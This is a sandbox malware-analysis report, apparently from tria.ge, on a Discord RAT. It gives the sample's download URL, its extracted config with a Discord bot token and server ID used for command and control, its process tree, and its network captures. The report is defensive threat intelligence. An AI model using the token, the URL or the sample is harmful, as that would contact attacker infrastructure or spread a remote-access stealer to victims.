Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://cdn.discorda...

windows10-2004-x64

10

Analysis

  • max time kernel
    269s
  • max time network
    271s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/03/2024, 19:43 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&

Score
10/10
discordratpersistenceratrootkitstealer

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIyMTkwNjUwNzI5ODM3NzkzMA.GiWyBe.bMc6EfTRKlt2YGmTuWnfGBRENjujQeWux4PFow

  • server_id

    1221895306120265778

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

    stealerrootkitratpersistencediscordrat
  • Executes dropped EXE 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3984
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9b3b46f8,0x7ffa9b3b4708,0x7ffa9b3b4718
      2⤵
        PID:2044
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        2⤵
          PID:1508
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1120
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
          2⤵
            PID:2316
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
            2⤵
              PID:2572
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
              2⤵
                PID:4532
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                2⤵
                  PID:3052
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3572
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
                  2⤵
                    PID:4404
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
                    2⤵
                      PID:4016
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3372 /prefetch:8
                      2⤵
                        PID:684
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                        2⤵
                          PID:2692
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4640
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
                          2⤵
                            PID:4640
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
                            2⤵
                              PID:3292
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4251156131658633697,17164283106898303899,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4632 /prefetch:2
                              2⤵
                                PID:2164
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:3996
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:540
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:5392
                                  • C:\Program Files\7-Zip\7zG.exe
                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Client-built\" -spe -an -ai#7zMap21022:86:7zEvent25284
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:5704
                                  • C:\Users\Admin\Downloads\Client-built\Client-built.exe
                                    "C:\Users\Admin\Downloads\Client-built\Client-built.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5796
                                  • C:\Windows\system32\taskmgr.exe
                                    "C:\Windows\system32\taskmgr.exe" /4
                                    1⤵
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:5972
                                  • C:\Users\Admin\Downloads\Client-built\Client-built.exe
                                    "C:\Users\Admin\Downloads\Client-built\Client-built.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3360

                                  Network

                                  • flag-us
                                    DNS
                                    81.171.91.138.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    81.171.91.138.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    81.171.91.138.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    81.171.91.138.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    cdn.discordapp.com
                                    msedge.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cdn.discordapp.com
                                    IN A
                                    Response
                                    cdn.discordapp.com
                                    IN A
                                    162.159.133.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.129.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.130.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.135.233
                                    cdn.discordapp.com
                                    IN A
                                    162.159.134.233
                                  • flag-us
                                    GET
                                    https://cdn.discordapp.com/attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4&
                                    msedge.exe
                                    Remote address:
                                    162.159.133.233:443
                                    Request
                                    GET /attachments/1221895306933833802/1221907200394530947/Client-built.rar?ex=661448c2&is=6601d3c2&hm=742e59191c8cd438d9f6924dfa9ee35cfa6c17abf842ad49793d52839320cfb4& HTTP/2.0
                                    host: cdn.discordapp.com
                                    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                    sec-ch-ua-mobile: ?0
                                    dnt: 1
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    accept-encoding: gzip, deflate, br
                                    accept-language: en-US,en;q=0.9
                                    Response
                                    HTTP/2.0 200
                                    date: Mon, 25 Mar 2024 19:43:15 GMT
                                    content-type: application/vnd.rar
                                    content-length: 26774
                                    cf-ray: 86a163855f1b6430-LHR
                                    cf-cache-status: MISS
                                    accept-ranges: bytes, bytes
                                    cache-control: public, max-age=31536000
                                    content-disposition: attachment; filename="Client-built.rar"
                                    etag: "3d78b5ab445d0602ff0c4b47582d91c5"
                                    expires: Tue, 25 Mar 2025 19:43:15 GMT
                                    last-modified: Mon, 25 Mar 2024 19:42:58 GMT
                                    vary: Accept-Encoding
                                    alt-svc: h3=":443"; ma=86400
                                    x-goog-generation: 1711395778575456
                                    x-goog-hash: crc32c=wUCvAw==
                                    x-goog-hash: md5=PXi1q0RdBgL/DEtHWC2RxQ==
                                    x-goog-metageneration: 1
                                    x-goog-storage-class: STANDARD
                                    x-goog-stored-content-encoding: identity
                                    x-goog-stored-content-length: 26774
                                    x-guploader-uploadid: ABPtcPpaVP-ZsfAjbQw_HpcEo6_m8QzzsO-ih9kKda412uUs9wPkfpTdAzIeRz4wcC_1TRsjseo
                                    x-robots-tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                    set-cookie: __cf_bm=12XOFFQrjtnFHGJ2GUn01szkYq8waXruC_4NSXbCeFo-1711395795-1.0.1.1-dCkCBHqOODFr4uaJnSztcT4F39_ACsl6cDyNoqUWXfq1DTLPaztzx9_3HP7bweImIR0VIiBQl1zsxYJ2stYLOA; path=/; expires=Mon, 25-Mar-24 20:13:15 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWEEPTbcWx4y%2BXu8S%2FLLP2qM5LaMqzRf3gyenb6uXSm6iBZ7kgAbGCDMPZJ%2Fj5xscmQmMU9zyNMaGUsuvlLvg73wZlSZOPTcyzv2LdkV7ViWKrx0LikAXJ2YrXrvaSAJ5jro4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    set-cookie: _cfuvid=VBFGENfq44mZv_j5Shpcssn8GoL4hZr9XnnPCiZsbTo-1711395795111-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                    server: cloudflare
                                  • flag-us
                                    DNS
                                    0.159.190.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0.159.190.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    61.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    61.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    61.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-61deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    233.133.159.162.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    233.133.159.162.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    13.86.106.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    13.86.106.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    9.228.82.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    9.228.82.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    43.58.199.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    43.58.199.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    41.110.16.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    41.110.16.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    41.110.16.96.in-addr.arpa
                                    IN PTR
                                    a96-16-110-41deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    50.23.12.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    50.23.12.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    gateway.discord.gg
                                    Client-built.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    gateway.discord.gg
                                    IN A
                                    Response
                                    gateway.discord.gg
                                    IN A
                                    162.159.133.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.136.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.130.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.135.234
                                    gateway.discord.gg
                                    IN A
                                    162.159.134.234
                                  • flag-us
                                    DNS
                                    gateway.discord.gg
                                    Client-built.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    gateway.discord.gg
                                    IN A
                                  • flag-us
                                    GET
                                    https://gateway.discord.gg/?v=9&encording=json
                                    Client-built.exe
                                    Remote address:
                                    162.159.133.234:443
                                    Request
                                    GET /?v=9&encording=json HTTP/1.1
                                    Connection: Upgrade,Keep-Alive
                                    Upgrade: websocket
                                    Sec-WebSocket-Key: uPXFDRKz7aziwqozWBckXA==
                                    Sec-WebSocket-Version: 13
                                    Host: gateway.discord.gg
                                    Response
                                    HTTP/1.1 101 Switching Protocols
                                    Date: Mon, 25 Mar 2024 19:43:35 GMT
                                    Connection: upgrade
                                    sec-websocket-accept: Hoz5Ky/7+qgsVffE5L20qGHu4kM=
                                    upgrade: websocket
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FUzKM0J%2BjZ9L3JcNPhdVkN8ctq5UQPKthpPBQeI4EjtldQKvKAOndkai4zfW9lFtO9i274nYY%2BMROubKNngMlUXUqNpRi3hkR%2BTKi6zHL%2BseJFeGeEha469VDPbPmClAyQ2C0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    X-Content-Type-Options: nosniff
                                    Server: cloudflare
                                    CF-RAY: 86a16404ccee773b-LHR
                                  • flag-us
                                    DNS
                                    206.23.85.13.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    206.23.85.13.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    234.133.159.162.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    234.133.159.162.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    195.177.78.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    195.177.78.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    195.177.78.104.in-addr.arpa
                                    IN PTR
                                    a104-78-177-195deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    119.110.54.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    119.110.54.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    140.71.91.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    140.71.91.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    140.71.91.104.in-addr.arpa
                                    IN PTR
                                    a104-91-71-140deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    55.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    55.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    55.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-55deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    72.135.221.88.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    72.135.221.88.in-addr.arpa
                                    IN PTR
                                    Response
                                    72.135.221.88.in-addr.arpa
                                    IN PTR
                                    a88-221-135-72deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    45.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    45.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    45.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-45deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-83deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    83.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    83.179.17.96.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    GET
                                    https://gateway.discord.gg/?v=9&encording=json
                                    Client-built.exe
                                    Remote address:
                                    162.159.133.234:443
                                    Request
                                    GET /?v=9&encording=json HTTP/1.1
                                    Connection: Upgrade,Keep-Alive
                                    Upgrade: websocket
                                    Sec-WebSocket-Key: wPOTBHsUbIcgym5aheReGA==
                                    Sec-WebSocket-Version: 13
                                    Host: gateway.discord.gg
                                    Response
                                    HTTP/1.1 101 Switching Protocols
                                    Date: Mon, 25 Mar 2024 19:44:27 GMT
                                    Connection: upgrade
                                    sec-websocket-accept: zzze41oiyHdHNydu2fcNbHz1kSM=
                                    upgrade: websocket
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZEyuF209ST41sFmxHQu97cNQiQ9bbXN8aQ1DTGlL0roZz2%2BF3hUEenfw05S%2FC98S7HUOPqzcT5mWOTnnLDh41F5UPDQkciu2hivXmUBl0yB7QKmKMxntn5TZWkFyaQRSP1eGmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    X-Content-Type-Options: nosniff
                                    Server: cloudflare
                                    CF-RAY: 86a165498b7c7719-LHR
                                  • flag-us
                                    DNS
                                    64.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    64.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    64.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-64deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    68.179.17.96.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    68.179.17.96.in-addr.arpa
                                    IN PTR
                                    Response
                                    68.179.17.96.in-addr.arpa
                                    IN PTR
                                    a96-17-179-68deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    11.227.111.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    11.227.111.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    tse1.mm.bing.net
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tse1.mm.bing.net
                                    IN A
                                    Response
                                    tse1.mm.bing.net
                                    IN CNAME
                                    mm-mm.bing.net.trafficmanager.net
                                    mm-mm.bing.net.trafficmanager.net
                                    IN CNAME
                                    dual-a-0001.a-msedge.net
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    204.79.197.200
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    13.107.21.200
                                  • flag-us
                                    DNS
                                    tse1.mm.bing.net
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tse1.mm.bing.net
                                    IN A
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 633835
                                    content-type: image/jpeg
                                    x-cache: TCP_HIT
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 2D20AC793B1441D98B0DE781133C2A13 Ref B: LON04EDGE1209 Ref C: 2024-03-25T19:44:57Z
                                    date: Mon, 25 Mar 2024 19:44:57 GMT
                                  • flag-us
                                    GET
                                    https://tse1.mm.bing.net/th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /th?id=OADD2.10239339388227_12445L34APGOUOAUP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                                    host: tse1.mm.bing.net
                                    accept: */*
                                    accept-encoding: gzip, deflate, br
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                    Response
                                    HTTP/2.0 200
                                    cache-control: public, max-age=2592000
                                    content-length: 737521
                                    content-type: image/jpeg
                                    x-cache: TCP_HIT
                                    access-control-allow-origin: *
                                    access-control-allow-headers: *
                                    access-control-allow-methods: GET, POST, OPTIONS
                                    timing-allow-origin: *
                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
